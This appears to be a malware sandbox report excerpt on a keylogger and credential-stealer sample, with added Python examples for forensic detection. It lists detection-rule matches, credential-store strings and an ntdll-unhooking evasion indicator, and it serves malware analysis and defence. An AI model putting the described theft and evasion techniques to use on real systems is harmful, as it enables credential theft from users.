                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A63451
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A69451
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6345F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6EBA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A68FB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A62BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A67B87
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6CB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A65788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A62B9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6EB99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A65BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6AFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6AFF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A62FFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A65BCF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A65320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A67721
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A65330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A67730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A62300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6E701
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6E710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A67B77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6CB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A62749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6AB49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A627582_2_05A62758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6AB582_2_05A6AB58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61EA82_2_05A61EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A6B02_2_05A6A6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66E822_2_05A66E82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64A802_2_05A64A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66E802_2_05A66E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61E992_2_05A61E99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C6E82_2_05A6C6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A622F02_2_05A622F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A672C72_2_05A672C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A6C02_2_05A6A6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64ECA2_2_05A64ECA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64ED82_2_05A64ED8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A672D82_2_05A672D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C6D92_2_05A6C6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A646282_2_05A64628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66A282_2_05A66A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A2282_2_05A6A228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61A3F2_2_05A61A3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6461A2_2_05A6461A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A66A182_2_05A66A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6A2182_2_05A6A218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A64A6F2_2_05A64A6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E2682_2_05A6E268
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6E2782_2_05A6E278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C2412_2_05A6C241
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A61A502_2_05A61A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05A6C2502_2_05A6C250
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: String function: 00670D27 appears 70 times
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: String function: 00657F41 appears 36 times
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: String function: 00678B40 appears 42 times
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.977473937.000000000407D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003CB3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe
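The three OriginalFilename hits above compare version-resource strings found in the sample's memory with the name of the file on disk: the sample's own process carries PE version information naming ntdll.dll (in two regions) and Remington.exe, and neither matches the executable that was run. The Python below is an added example and not part of the Joe Sandbox report. It pulls every OriginalFilename value out of a raw memory or file buffer and lists the ones that disagree with the sample name. The buffer it scans is constructed inline; the only layout assumption is the one Windows version resources actually use, a UTF-16LE key followed by its NUL and optional 32-bit alignment padding, then the UTF-16LE value.

```python
# Added example: scan a raw buffer for PE version-resource OriginalFilename
# values and report those that do not match the file name on disk.
# The buffer below is constructed for this example, not dumped from the sample.

SAMPLE_NAME = "Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"


def utf16(s: str) -> bytes:
    """Encode as Windows stores resource strings: UTF-16LE."""
    return s.encode("utf-16-le")


# Two String entries as they sit inside a VS_VERSIONINFO StringTable:
# key, NUL terminator, optional 32-bit alignment pad, value, NUL.
CONSTRUCTED_DUMP = (
    b"\x00" * 8
    + utf16("OriginalFilename\0") + utf16("ntdll.dll\0")                 # no pad
    + b"\xff" * 5                                                         # unrelated bytes
    + utf16("FileDescription\0") + b"\0\0" + utf16("x\0")                 # a different key
    + utf16("OriginalFilename\0") + b"\0\0" + utf16("Remington.exe\0")    # padded
)

KEY = utf16("OriginalFilename\0")


def extract_original_filenames(buf: bytes) -> list:
    """Return every OriginalFilename value in buf, in order of appearance."""
    names = []
    pos = 0
    while True:
        pos = buf.find(KEY, pos)
        if pos < 0:
            break
        cur = pos + len(KEY)
        # Skip the alignment pad: zero WCHARs between key and value.
        while cur + 1 < len(buf) and buf[cur:cur + 2] == b"\0\0":
            cur += 2
        chars = []
        while cur + 1 < len(buf) and buf[cur:cur + 2] != b"\0\0":
            chars.append(buf[cur:cur + 2])
            cur += 2
        try:
            names.append(b"".join(chars).decode("utf-16-le"))
        except UnicodeDecodeError:
            pass  # not a real string entry; keep scanning
        pos = cur
    return names


def mismatched_original_filenames(buf: bytes, sample_name: str) -> list:
    """Embedded names that differ from the on-disk name (case-insensitive)."""
    expected = sample_name.lower()
    return sorted({n for n in extract_original_filenames(buf) if n.lower() != expected})


if __name__ == "__main__":
    for name in mismatched_original_filenames(CONSTRUCTED_DUMP, SAMPLE_NAME):
        print(f"OriginalFilename {name!r} vs {SAMPLE_NAME}")
```

Run against a real dump the same way: read the .sdmp or the file into `buf` and pass the on-disk name. A mismatch on its own is weak (renamed legitimate software produces one too), but a version resource naming ntdll.dll inside a user-mode executable's private memory is worth following up, since it means a copy of ntdll's bytes, not just its name, is sitting there.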
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006BA2D5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006A8713 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006BC602 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00654FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | File created: C:\Users\user\AppData\Local\Temp\spado
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003119000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000314B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000310B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.000000000313E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | ReversingLabs: Detection: 47%
                Source: unknown | Process created: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe"
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static file information: File size 1631232 > 1048576
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.978158836.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000003.979850232.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
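Both wntdll.pdb hits come from the sample's own process (analysis id 0, PID 6244), in regions whose dump names end in 00000004.00001000.00020000, that is PAGE_READWRITE, MEM_COMMIT, MEM_PRIVATE. That is private heap memory at 0x3B90000 and 0x3F50000, not the image mapping the loader created for ntdll, so the process holds a second copy of ntdll's bytes; this is consistent with loading a fresh ntdll from disk to get unhooked function bodies. The string itself lives in the CodeView RSDS debug record: the magic RSDS, a 16-byte GUID, a 32-bit age and a NUL-terminated PDB path. The Python below is an added example and not part of the report. It walks a set of memory regions for RSDS records and reports ntdll debug records in regions whose base is not a loader-known module. The regions, the module list, the GUID and the age are constructed inline.

```python
# Added example: locate CodeView RSDS debug records in dumped memory regions and
# report ntdll debug records that sit outside the loader's module list.
# Regions, module list, GUID and age below are constructed for this example.
import struct
import uuid

NTDLL_PDBS = {"wntdll.pdb", "ntdll.pdb"}  # 32-bit and 64-bit ntdll debug names


def rsds_record(pdb_path: str, guid: uuid.UUID, age: int) -> bytes:
    """Build an RSDS record: magic, GUID (little-endian layout), age, path, NUL."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + pdb_path.encode() + b"\0"


FAKE_GUID = uuid.UUID("0123456789abcdef0123456789abcdef")  # constructed

# (base address, bytes) as a forensic tool would hand them over.
CONSTRUCTED_REGIONS = [
    (0x77000000, b"MZ" + b"\0" * 30 + rsds_record("wntdll.pdb", FAKE_GUID, 1)),    # loader-mapped ntdll
    (0x76000000, b"MZ" + b"\0" * 30 + rsds_record("kernel32.pdb", FAKE_GUID, 3)),  # another module
    (0x03B90000, b"\xcc" * 17 + rsds_record("wntdll.pdb", FAKE_GUID, 1) + b"\0" * 4),  # private copy
    (0x03F50000, b"RSDS" + b"\0" * 10),  # truncated record: must not crash the scan
]
LOADER_MODULE_BASES = {0x77000000, 0x76000000}  # what the PEB module list reports


def find_rsds_records(buf: bytes) -> list:
    """All (offset, guid, age, pdb_path) records in buf whose path ends in .pdb."""
    records = []
    pos = 0
    while True:
        pos = buf.find(b"RSDS", pos)
        if pos < 0 or pos + 24 > len(buf):
            break
        end = buf.find(b"\0", pos + 24)
        if end < 0:
            break
        path = buf[pos + 24:end].decode("ascii", errors="replace")
        if path.lower().endswith(".pdb"):
            guid = str(uuid.UUID(bytes_le=buf[pos + 4:pos + 20]))
            age = struct.unpack_from("<I", buf, pos + 20)[0]
            records.append((pos, guid, age, path))
        pos = end + 1
    return records


def unexpected_ntdll_copies(regions: list, module_bases: set) -> list:
    """Virtual addresses of ntdll RSDS records outside loader-known modules."""
    hits = []
    for base, buf in regions:
        for offset, _guid, _age, path in find_rsds_records(buf):
            name = path.lower().rsplit("\\", 1)[-1]
            if name in NTDLL_PDBS and base not in module_bases:
                hits.append(base + offset)
    return hits


if __name__ == "__main__":
    for va in unexpected_ntdll_copies(CONSTRUCTED_REGIONS, LOADER_MODULE_BASES):
        print(f"ntdll debug record in non-module memory at 0x{va:08X}")
```

On a live host the regions come from VirtualQueryEx over MEM_PRIVATE and MEM_MAPPED committed memory and the module bases from the PEB's loader list; a hit means someone loaded ntdll's bytes themselves, and the GUID and age let you confirm against the on-disk ntdll that it is the same build, not a stale copy.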
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006CC304 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00678B85 push ecx; ret 0_2_00678B98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_01259C30 push esp; retf 0127h 2_2_01259D55
